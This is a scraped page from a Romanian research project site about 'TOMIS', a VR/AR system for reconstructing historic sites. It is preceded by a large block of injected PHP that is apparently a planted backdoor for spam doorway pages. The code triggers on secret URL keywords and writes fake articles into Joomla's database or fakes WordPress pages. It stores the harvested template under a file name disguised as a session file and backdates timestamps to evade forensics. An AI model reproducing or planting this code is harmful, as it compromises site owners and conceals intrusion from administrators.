if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } T.O.M.I.S.
T.O.M.I.S.
PDF Print E-mail
Contract Nr. 11-041 / 14.09.2007
Finantare: Buget de Stat - Ministerul Educatiei, Cercetarii si Tineretului.
Programul: PARTENERIATE IN DOMENIILE PRIORITARE
Categoria de proiect: 1
Denumirea proiectului: uTilizarea realitatii virtuale in recOnstituirea Multimodala 3D a site-urilor IStorice (acronim TOMIS)
Durata contractului: (sept.2007-dec.2010)

 

 

Recunoscand rolul central pe care il ocupa cultura membrilor societatii in evolutia sa armoniasa precum si importanta utilizarii tehnologiilor avansate, cum sunt Realitatea Virtuala (Virtual Reality - VR) si Realitatea Imbunatatita (Augmented Reality – AR), in difuzarea acesteia, comunitatea Europeana inscrie aceste directii printre prioritatile sale enuntate in PC6 si PC7.

 
Proiectul TOMIS isi propune proiectarea, implementarea, experimentarea si demonstrarea unui sistem multi-senzorial, interactiv si colaborativ, bazat pe tehnologiile VR/AR, destinat activitatilor de promovare a culturii in general, si de reconstituire a siteurilor istorice si organizare a vizitelor virtuale in special. Cercet─ârile dezvoltate in cadrul proiectului ofera solutii inovatoare asupra problemelor care implica modelarea si reconstructia geometrica 3D a artefactelor istorice precum si reconstituirea societatilor virtuale caracteristice unei perioade istorice bine delimitate.

 
Nu in ultimul rand, prin experienta multi-modala propusa vizitatorilor proiectul se incadreaza in politica nationala de modernizare si promovare a turismului, utilizandu-se tehnici avansate ale mileniului III si permitand Romaniei o integrare tehnologico-culturala naturala in peisajul European.
 
We have 1 guest online